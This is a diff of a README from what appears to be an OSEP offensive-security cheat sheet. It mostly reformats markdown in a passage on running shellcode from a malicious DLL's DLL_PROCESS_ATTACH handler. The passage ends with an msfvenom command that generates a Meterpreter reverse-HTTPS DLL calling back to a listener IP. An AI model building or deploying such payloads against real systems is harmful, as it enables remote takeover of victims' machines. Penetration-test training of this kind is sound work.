peterkhe1999/CheatSheet/OSEP/README.md

 }
 ```

-The **DLL_PROCESS_ATTACH** reason code is passed to DllMain when the DLL is being loaded into the virtual memory address space as a result of a call to LoadLibrary.
+The `DLL_PROCESS_ATTACH` reason code is passed to `DllMain` when the DLL is being loaded into the virtual memory address space as a result of a call to `LoadLibrary`.

-=> Instead of defining our shellcode as a standard API exported by our malicious DLL, put our shellcode within the DLL_PROCESS_ATTACH switch case, where it will be executed when LoadLibrary calls DllMain.
+Instead of defining our shellcode as a standard API exported by our malicious DLL, put our shellcode within the `DLL_PROCESS_ATTACH` switch case, where it will be executed when `LoadLibrary` calls `DllMain`.

-Generate a Meterpreter DLL with msfvenom:
+Generate a Meterpreter DLL with `msfvenom`:

 ```bash
 msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f dll -o met.dll